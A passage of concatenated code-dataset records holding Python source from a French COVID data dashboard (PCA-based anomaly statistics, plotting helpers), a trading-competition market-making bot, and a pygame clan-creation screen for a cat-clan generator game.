len(data) 
gets large\n # this leads to divide-by-zeros below\n scaling_factors = np.power(1. - alpha, np.arange(data.size + 1, dtype=dtype),\n dtype=dtype)\n # create cumulative sum array\n np.multiply(data, (alpha * scaling_factors[-2]) / scaling_factors[:-1],\n dtype=dtype, out=out)\n np.cumsum(out, dtype=dtype, out=out)\n # cumsums / scaling\n out /= scaling_factors[-2::-1]\n if offset != 0:\n offset = np.array(offset, copy=False).astype(dtype, copy=False)\n # add offsets\n out += offset * scaling_factors[1:]\n return out\n\n @staticmethod\n def pca(data, pcdim, q, normalize, start_d_learn, end_d_learn, alpha):\n \"\"\"\n Get PCA on data\n \"\"\"\n dataindex = data.index\n #learn_data = data[(data.index>=start_d_learn) & (data.index<=end_d_learn)].copy()\n learn_data = data[(data.index>=datetime.strptime(start_d_learn, '%d/%m/%Y').strftime(\"%Y-%m-%d\")) & (data.index<=datetime.strptime(end_d_learn, '%d/%m/%Y').strftime(\"%Y-%m-%d\"))].copy()\n if normalize is True:\n std = StandardScaler().fit(learn_data)\n learn_data = std.transform(learn_data)\n data = std.transform(data)\n \n u, s, vh = np.linalg.svd(np.dot(np.transpose(learn_data), learn_data)/(learn_data.shape[0]), full_matrices=True)\n \n u_tilde = u[:, pcdim:]\n c_tilde = np.dot(u_tilde, np.transpose(u_tilde))\n spe = np.diag(np.dot(np.dot(data, c_tilde), np.transpose(data)))\n \n numgspe = np.trace(np.square(np.diag(s[pcdim:])))\n dengspe = np.trace(np.diag(s[pcdim:]))\n gspe = numgspe/dengspe\n\n numhspe = np.square(dengspe)\n denhspe = numgspe\n hspe = numhspe/denhspe\n\n u_hat = u[:, :pcdim]\n c_hat_Hotelling =np.dot(np.dot(u_hat, inv(np.diag(s[:pcdim]))), np.transpose(u_hat)) \n t2 = np.diag(np.dot(np.dot(data, c_hat_Hotelling), np.transpose(data)))\n\n return {\"SPE\": {\n \"dataindex\": dataindex,\n \"spe\": spe,\n \"smoothed_spe\": CovidFr.ewma_filter(data=spe, alpha=alpha),\n \"threshold\": gspe*chi2.ppf(q, df=hspe),\n },\n \"Hotelling\": {\n \"dataindex\": dataindex,\n \"t2\": t2,\n \"smoothed_t2\": CovidFr.ewma_filter(data=t2, alpha=alpha),\n \"threshold\": chi2.ppf(q, df=pcdim),\n },\n \"eigenvalues\": s,\n }\n\n @staticmethod\n def regiondailycases(data, feature):\n if feature in [\"dc\", \"rad\"]: \n dr = {}\n for r in data.reg.unique():\n regdep = []\n for d in data[data.reg==r].dep.unique():\n regdep.append(CovidFr.dailycases(data=data[(data.dep == d) & (data.sexe == 0)].groupby(['jour']).sum(), pca=True))\n cdata = reduce(lambda x, y: x.add(y, fill_value=0), regdep)\n dr.update({\"reg-\"+r: cdata[feature]})\n return pd.DataFrame.from_dict(dr)\n elif feature in [\"hosp\", \"rea\"]:\n data_reg = pd.DataFrame()\n for r in data.reg.unique():\n data_reg['reg-{}'.format(r)] = data[(data.sexe == 0) & (data.reg == r)].groupby(\"jour\").sum()[feature]\n return data_reg\n \n @staticmethod\n def topdepdataviz(data, **kwargs):\n top = kwargs.get('top', False)\n top_number = kwargs.get('top_number', None)\n threshold = kwargs.get('threshold', None)\n\n if top:\n df = data.sort_values(by=data.index.max(), axis=1, ascending=False)\n select_dep_data_norm_col = df[df.columns[:top_number]]\n else:\n select_dep_data_norm_col = data[data.columns[[item for elem in (data[-1:] > threshold).values.tolist() for item in elem]]]\n\n return select_dep_data_norm_col\n \n @staticmethod\n def dataviz(x, y, curve_type, **kwargs):\n name = kwargs.get('name', None)\n color = kwargs.get('color', None)\n width = kwargs.get('width', None)\n opacity = kwargs.get('opacity', None)\n hovertemplate = kwargs.get('hovertemplate', None)\n text = kwargs.get('text', 
None)\n showlegend = kwargs.get('showlegend', None)\n\n output = dict(\n x = x,\n y = y,\n type = curve_type,\n name = name,\n marker = dict(\n color = color,\n line = dict(\n color = color, \n width = width,\n ),\n opacity = opacity,\n ),\n hovertemplate = hovertemplate,\n text = text,\n showlegend = showlegend,\n )\n return output\n\n @staticmethod\n def layoutoption(**kwargs):\n title = kwargs.get('title', None)\n barmode = kwargs.get('barmode', None)\n linemode = kwargs.get('linemode', None)\n legend_orientation = kwargs.get('legend_orientation', None)\n legend = kwargs.get('legend', None)\n margin = kwargs.get('margin', None)\n annotations = kwargs.get('annotations', None)\n\n output = dict(\n title = title,\n barmode = barmode,\n linemode = linemode,\n legend_orientation = legend_orientation,\n legend = legend,\n margin = margin,\n annotations = annotations,\n )\n return output \n\n @staticmethod\n def updatechecking(json_url, data_request_url):\n with urllib.request.urlopen(json_url) as url:\n data = json.loads(url.read().decode())\n #data = json.loads(data)\n for dataset in data['@graph']:\n if 'accessURL' in dataset.keys() and dataset['accessURL'] == data_request_url:\n return dataset['modified']","repo_name":"mnassrib/covid-fr-dashboard","sub_path":"cutils/covidclass.py","file_name":"covidclass.py","file_ext":"py","file_size_in_byte":57240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70663612267","text":"from utc_bot import UTCBot, start_bot\nimport proto.utc_bot as pb\nimport betterproto\nimport sys\nimport asyncio\nfrom case1_bot import Case1Bot\n\nCONTRACTS = [\"LBSJ\",\"LBSM\", \"LBSQ\", \"LBSV\", \"LBSZ\"]\nORDER_SIZE = 20\nSPREAD = 2\n\nEXPIRY_PRICE = { #2016-2021\n \"LBSJ\": [221.23,210.73,185.91,220.15,219.58,213.2],\n \"LBSM\": [207.55,209.6,280.91,281.31,255.24,208.49],\n \"LBSQ\": [246.63,276.45,260.07,227.84,242.59,258.71],\n \"LBSV\": [262.2,296.24,244.98,228.33,242.1,270.32],\n \"LBSZ\": [282.58,260.49,265.63,280.89,311.71,330.02]\n}\n\n\nclass MMBoT(Case1Bot):\n\n def set_year(self):\n self.year = year # for pnl\n def update_fairs(self):\n # updates fairs, also sets the state to offset positions\n for month in CONTRACTS:\n self.fairs[month] = 300\n\n\n\n def get_spread(self):\n \n our_spread = {}\n for month in CONTRACTS:\n fair = self.fairs[month]\n \n (lo, hi) = self.spread[month]\n if self.pos[month] >= 5:\n if self.state[month] != \"sell\":\n hi = lo + (hi-lo)*(1/4) # moving to sell state\n else:\n hi -= 1\n bid_size, ask_size = 1, self.pos[month]+1\n self.state[month] = \"sell\" # want to sell off\n \n elif self.pos[month] <= -5:\n if self.state[month] != \"buy\":\n lo = hi - (hi-lo) * (3/4)\n else:\n lo += 1\n bid_size, ask_size = abs(self.pos[month])+1, 1\n self.state[month] = \"buy\"\n else:\n self.state[month] = \"normal\"\n lo, hi = fair - 40, fair + 40\n\n bid_size, ask_size = 10, 10\n \n self.spread[month] = (lo, hi)\n \n our_spread[month] = [lo, hi, bid_size, ask_size]\n\n return our_spread\n\n\nif __name__ == \"__main__\":\n year = sys.argv[1]\n print(year)\n start_bot(MMBoT)","repo_name":"bg459/utc","sub_path":"utc_xchange_v1.1/case1/mm_bot_v1.py","file_name":"mm_bot_v1.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40567923095","text":"import pygame\nfrom random import choice, randrange\n\nfrom .base_screens import Screens\n\nfrom scripts.game_structure.text import *\nfrom 
scripts.game_structure.buttons import buttons\nfrom scripts.utility import draw, draw_big, draw_large\nfrom scripts.clan import Clan, map_available\nfrom scripts.cat.cats import create_example_cats\nfrom scripts.cat.names import names\nfrom scripts.cat.sprites import tiles\nimport scripts.game_structure.image_cache as image_cache\n#from scripts.world import World, save_map\nmap_available = False\n\ndef roll_button(self, x_value, y_value, arg0):\n buttons.draw_image_button((x_value, y_value),\n button_name='random_dice',\n re_roll=True,\n size=(34, 34),\n available=arg0)\ndef draw_main_menu(self):\n verdana_small.text(\n 'Note: going back to main menu resets the generated cats.',\n (25, 25))\n buttons.draw_image_button((25, 50),\n button_name='main_menu',\n text='<< Back to Main Menu',\n cur_screen='start screen',\n naming_text='',\n set_game_mode=False,\n size=(153, 30)\n )\n\n\nclass MakeClanScreen(Screens):\n\n # UI images\n clan_frame_img = pygame.image.load(\n 'resources/images/pick_clan_screen/clan_name_frame.png').convert_alpha()\n name_clan_img = pygame.image.load(\n 'resources/images/pick_clan_screen/name_clan_light.png').convert_alpha()\n leader_img = pygame.image.load(\n 'resources/images/pick_clan_screen/leader_light.png').convert_alpha()\n deputy_img = pygame.image.load(\n 'resources/images/pick_clan_screen/deputy_light.png').convert_alpha()\n medic_img = pygame.image.load(\n 'resources/images/pick_clan_screen/med_light.png').convert_alpha()\n clan_img = pygame.image.load(\n 'resources/images/pick_clan_screen/clan_light.png').convert_alpha()\n bg_preview_border = pygame.transform.scale(\n pygame.image.load(\"resources/images/bg_preview_border.png\").convert_alpha(), (466, 416))\n def draw_clan_name(self):\n # draw name and frame\n screen.blit(MakeClanScreen.clan_frame_img, (292, 100))\n verdana_light.text(game.switches['clan_name'] + 'Clan', ('center', 115))\n\n def game_mode(self):\n # ---------------------------------------------------------------------------- #\n # layout #\n # ---------------------------------------------------------------------------- #\n draw_main_menu(self)\n text_box = image_cache.load_image(\n 'resources/images/game_mode_text_box.png').convert_alpha()\n screen.blit(text_box, (325, 130))\n\n y_value = 240\n\n # ---------------------------------------------------------------------------- #\n # mode selection #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] is None:\n game.switches['game_mode'] = 'classic'\n\n buttons.draw_image_button((109, y_value),\n button_name='classic_mode',\n size=(132, 30),\n game_mode='classic',\n )\n y_value += 80\n buttons.draw_image_button((94, y_value),\n button_name='expanded_mode',\n size=(162, 34),\n game_mode='expanded',\n )\n y_value += 80\n buttons.draw_image_button((100, y_value),\n button_name='cruel_season',\n size=(150, 30),\n game_mode='cruel season',\n )\n\n # ---------------------------------------------------------------------------- #\n # classic text #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] == 'classic':\n y_value = 136\n x_value = 345\n verdana_big_light.text(\"Classic Mode\", (465, y_value))\n y_value += 50\n\n verdana_dark.blit_text(\"Sit back and relax. \\n\"\n \"This mode is Clan Generator at it's most basic. The player is not expected to \"\n \"manage the minutia of clan life. Perfect for a relaxing game session or for \"\n \"focusing on storytelling. 
\\nWith this mode you are the eye in the sky, \"\n \"watching the clan as their story unfolds.\",\n (x_value, y_value),\n line_break=40,\n x_limit=700\n )\n\n # ---------------------------------------------------------------------------- #\n # expanded text #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] == 'expanded':\n y_value = 136\n x_value = 345\n\n verdana_big_light.text(\"Expanded Mode\", (453, y_value))\n y_value += 50\n\n verdana_dark.blit_text(\"A more hands-on experience. \\nThis mode has everything in Classic Mode as well as \"\n \"more management focused features. \\nNew features include: \\n\"\n \"----no new features as of yet---- \\nWith this mode you'll be making the important \"\n \"clan-life decisions.\",\n (x_value, y_value),\n line_break=40,\n x_limit=700)\n\n # ---------------------------------------------------------------------------- #\n # cruel season text #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] == 'cruel season':\n y_value = 136\n x_value = 345\n\n verdana_big_light.text(\"Cruel Season\", (464, y_value))\n y_value += 50\n\n verdana_dark.blit_text(\"This mode has all the features of Expanded mode, but is significantly \"\n \"more difficult. If you'd like a challenge, then this mode is for you. \\n \\n\"\n \"---this mode is currently unavailable--- \\n \\nYou heard the warnings... \"\n \"a Cruel Season is coming. \\nWill you survive?\",\n (x_value, y_value),\n line_break=40,\n x_limit=700)\n\n buttons.draw_image_button((253, 620),\n button_name='last_step',\n text='< Last step',\n hotkey=[0],\n size=(147, 30),\n available=False\n )\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] != 'cruel season':\n buttons.draw_image_button((400, 620),\n button_name='next_step',\n text='Next Step',\n set_game_mode=True,\n available=True,\n size=(147, 30)\n )\n else:\n buttons.draw_image_button((400, 620),\n button_name='next_step',\n text='Next Step',\n set_game_mode=True,\n available=False,\n size=(147, 30)\n )\n\n verdana.text(\"Your clan's game mode is permanent and cannot be changed after clan creation.\", ('center', 581))\n\n\n def first_phase(self):\n # layout\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.name_clan_img, (0, 0))\n\n # color and placement of user input text\n self.game_screen.blit(game.naming_box, (265, 600))\n verdana_dark.text(game.switches['naming_text'], (265, 600))\n\n # choose random prefix\n verdana_light.text('-Clan', (410, 600))\n\n buttons.draw_image_button((222, 593),\n button_name='random_dice',\n text='Randomize',\n naming_text=choice(names.normal_prefixes),\n size=(34, 34),\n hotkey=[1]\n )\n # reset clan name\n buttons.draw_image_button((455, 595),\n button_name='reset_name',\n text='Reset Name',\n naming_text='',\n size=(134, 30),\n hotkey=[2]\n )\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 635),\n button_name='last_step',\n text='< Last step',\n set_game_mode=False,\n hotkey=[0],\n size=(147, 30)\n )\n\n if game.switches['naming_text'] != '':\n buttons.draw_image_button((400, 635),\n button_name='next_step',\n text='Next Step',\n 
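# the Next button carries the typed prefix forward as the clan name\n 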
clan_name=game.switches['naming_text'],\n available=True,\n size=(147, 30)\n )\n else:\n buttons.draw_image_button((400, 635),\n button_name='next_step',\n text='Next Step',\n clan_name=game.switches['naming_text'],\n available=False,\n size=(147, 30)\n )\n\n def second_phase(self):\n game.switches['naming_text'] = ''\n\n self.draw_clan_name()\n\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.leader_img, (0, 414))\n\n if len(game.switches['clan_list']) >= 3:\n roll_button(self, 83, 440, True)\n\n else:\n # three stacked dice; every re-roll spends one, so they grey out from the bottom up\n for i in range(3):\n roll_button(self, 155, 235 + 40 * i, i + game.switches['roll_count'] < 3)\n\n if game.switches['re_roll']:\n create_example_cats()\n game.switches['roll_count'] += 1\n game.switches['re_roll'] = False\n\n # draw cats to choose from\n for u in range(6):\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n for u in range(6, 12):\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n\n # draw clicked cat\n if game.switches['cat'] is not None and 12 > game.switches['cat'] >= 0:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat, (270, 200))\n if game.choose_cats[game.switches['cat']].age in [\n 'kitten', 'adolescent'\n ]:\n verdana.text(str(game.choose_cats[game.switches['cat']].name),\n ('center', 175))\n else:\n verdana.text(\n str(game.choose_cats[game.switches['cat']].name) +\n ' --> ' +\n game.choose_cats[game.switches['cat']].name.prefix +\n 'star', ('center', 175))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].gender), (440, 260))\n verdana_small.text(str(game.choose_cats[game.switches['cat']].age),\n (440, 275))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].trait), (440, 290))\n if game.choose_cats[game.switches['cat']].age in [\n 'kitten', 'adolescent'\n ]:\n verdana_red.text('Too young to become leader.', ('center', 360))\n else:\n buttons.draw_image_button((234, 348),\n button_name='grant_lives',\n text='Grant this cat their nine lives',\n leader=game.switches['cat'],\n size=(332, 52),\n hotkey=[1]\n )\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n clan_name='',\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n clan_name='',\n available=False,\n size=(147, 30)\n )\n\n def third_phase(self):\n self.draw_clan_name()\n 
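# deputy selection: same cat grid, with the chosen leader now pinned at (650, 200)\n 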
draw_main_menu(self)\n\n screen.blit(MakeClanScreen.deputy_img, (0, 414))\n\n for u in range(6):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n else:\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n for u in range(6, 12):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n else:\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n\n if game.switches['cat'] is not None and 12 > game.switches[\n 'cat'] >= 0 and game.switches['cat'] != game.switches['leader']:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat,(270, 200))\n verdana.text(str(game.choose_cats[game.switches['cat']].name),\n ('center', 175))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].gender), (440, 260))\n verdana_small.text(str(game.choose_cats[game.switches['cat']].age),\n (440, 275))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].trait), (440, 290))\n if game.choose_cats[game.switches['cat']].age in [\n 'kitten', 'adolescent'\n ]:\n verdana_red.text('Too young to become deputy.', ('center', 360))\n else:\n buttons.draw_image_button((209, 348),\n button_name='support_leader',\n text='This cat will support the leader',\n deputy=game.switches['cat'],\n size=(384, 52),\n hotkey=[1])\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n leader=None,\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n clan_name='',\n available=False,\n size=(147, 30)\n )\n\n def fourth_phase(self):\n self.draw_clan_name()\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.medic_img, (0, 414))\n\n for u in range(6):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n else:\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n\n for u in range(6, 12):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n else:\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n\n if game.switches['cat'] is not None and 12 > game.switches[\n 'cat'] >= 0 and game.switches['cat'] != game.switches[\n 'leader'] and game.switches['cat'] != game.switches[\n 'deputy']:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat,(270, 200))\n verdana.text(str(chosen_cat.name),\n ('center', 175))\n verdana_small.text(\n str(chosen_cat.gender), (440, 260))\n verdana_small.text(str(chosen_cat.age),\n (440, 275))\n verdana_small.text(\n str(chosen_cat.trait), (440, 290))\n if chosen_cat.age in [\n 'kitten', 'adolescent'\n ]:\n verdana_red.text('Too young to become medicine cat.',\n ('center', 360))\n else:\n buttons.draw_image_button((252, 342),\n button_name='aid_clan',\n text='This cat will aid the clan',\n medicine_cat=game.switches['cat'],\n hotkey=[1],\n size=(306, 58))\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # 
---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n deputy=None,\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n clan_name='',\n available=False,\n size=(147, 30)\n )\n\n def fifth_phase(self):\n self.draw_clan_name()\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.clan_img, (0, 414))\n\n for u in range(6):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n elif game.switches['medicine_cat'] == u:\n draw(game.choose_cats[u],(650, 300))\n elif u not in game.switches['members']:\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n if u in game.switches['members']:\n # recruited cats stack down the right-hand column in recruitment order\n draw(game.choose_cats[u], (700, 100 + 50 * game.switches['members'].index(u)))\n\n for u in range(6, 12):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n elif game.switches['medicine_cat'] == u:\n draw(game.choose_cats[u],(650, 300))\n elif u not in game.switches['members']:\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n if u in game.switches['members']:\n draw(game.choose_cats[u], (700, 100 + 50 * game.switches['members'].index(u)))\n\n if game.switches['cat'] is not None and 12 > game.switches['cat'] >= 0 and game.switches['cat'] not in [\n game.switches['leader'], game.switches['deputy'],\n game.switches['medicine_cat']\n ] and game.switches['cat'] not in game.switches['members']:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat, (270, 200))\n verdana.text(str(game.choose_cats[game.switches['cat']].name),\n ('center', 175))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].gender), (440, 260))\n verdana_small.text(str(game.choose_cats[game.switches['cat']].age),\n (440, 275))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].trait), (440, 290))\n if len(game.switches['members']) < 7:\n buttons.draw_image_button((353, 360),\n button_name='recruit',\n text='Recruit',\n members=game.switches['cat'],\n add=True,\n size=(95, 30),\n hotkey=[1])\n\n\n\n # Would be nice to make this button remove the last added member rather than all the members\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n 
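# note: stepping back clears the whole members list, not just the last recruit (see comment above)\n 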
medicine_cat=None,\n members=[],\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n\n if 0 == len(game.switches['members']):\n clan_none_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_none_light.png').convert_alpha()\n screen.blit(clan_none_img, (0, 414))\n elif 1 == len(game.switches['members']):\n clan_one_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_one_light.png').convert_alpha()\n screen.blit(clan_one_img, (0, 414))\n elif 2 == len(game.switches['members']):\n clan_two_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_two_light.png').convert_alpha()\n screen.blit(clan_two_img, (0, 414))\n elif 3 == len(game.switches['members']):\n clan_three_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_three_light.png').convert_alpha()\n screen.blit(clan_three_img, (0, 414))\n elif 3 < len(game.switches['members']) < 7:\n clan_four_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_four_light.png').convert_alpha()\n screen.blit(clan_four_img, (0, 414))\n elif 7 == len(game.switches['members']):\n clan_full_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_full_light.png').convert_alpha()\n screen.blit(clan_full_img, (0, 414))\n\n\n if 3 < len(game.switches['members']) < 8:\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n choosing_camp=True,\n biome='forest',\n camp_bg='camp1',\n hotkey=[2],\n size=(147, 30)\n )\n else:\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n available=False,\n size=(147, 30),\n hotkey=[2]\n )\n\n def sixth_phase(self):\n if map_available:\n for y in range(44):\n for x in range(40):\n noise_value = self.world.check_noise_tile(x, y)\n if noise_value > 0.1:\n #buttons.draw_maptile_button((x*TILESIZE,y*TILESIZE),image=(pygame.transform.scale(terrain.images[1],(TILESIZE,TILESIZE))))\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain1'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Desert\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'low', 'low', 'medium', 'medium',\n 'high'\n ]), 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium', 'high']),\n 'Prey Levels: ' +\n choice(['none', 'low', 'medium']),\n 'Plant Cover: ' +\n choice(['none', 'low', 'medium'])\n ]\n elif noise_value < -0.015:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain3'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Forest\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice(\n ['none', 'low', 'low', 'medium', 'high']),\n 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium']),\n 'Prey Levels: ' +\n choice(['low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['low', 'medium', 'high'])\n ]\n else:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain0'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Plains\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'low', 'medium', 'medium', 'high',\n 'high'\n ]), 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium', 'high']),\n 'Prey Levels: ' +\n choice(['low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['low', 'medium', 'high'])\n ]\n for y in range(44):\n for x in range(40):\n height = self.world.check_heighttile(x, y)\n if height < 0:\n buttons.draw_button((x * 16, y * 16),\n 
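# tiles below sea level render as ocean and stay unclaimable\n 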
image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif x == 0:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif x == 39:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif y == 0:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif y == 43:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif height < 0.03:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain6'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Beach\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'low', 'medium', 'medium', 'high',\n 'high'\n ]), 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium']),\n 'Prey Levels: ' +\n choice(['low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['none', 'low', 'medium'])\n ]\n elif height > 0.35:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain5'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Mountainous\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'none', 'low', 'low', 'medium', 'high'\n ]), 'Thunderpath Traffic: ' + choice([\n 'none', 'none', 'low', 'low', 'medium',\n 'medium', 'high'\n ]), 'Prey Levels: ' +\n choice(['none', 'low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['none', 'low', 'medium', 'high'])\n ]\n if (x, y) == game.switches['map_selection']:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terraintwo0'],\n (16, 16)),\n camp_site=(x, y))\n verdana_big.text('Map', (-16, 50))\n verdana.text(\n str(game.map_info[game.switches['map_selection']][0]) + \", \" +\n str(game.map_info[game.switches['map_selection']][1]),\n (-16, 100))\n verdana.text(str(game.map_info[game.switches['map_selection']][2]),\n (-16, 150))\n verdana.text(str(game.map_info[game.switches['map_selection']][3]),\n (-16, 200))\n verdana.text(str(game.switches['camp_site']), (-16, 250))\n\n if 
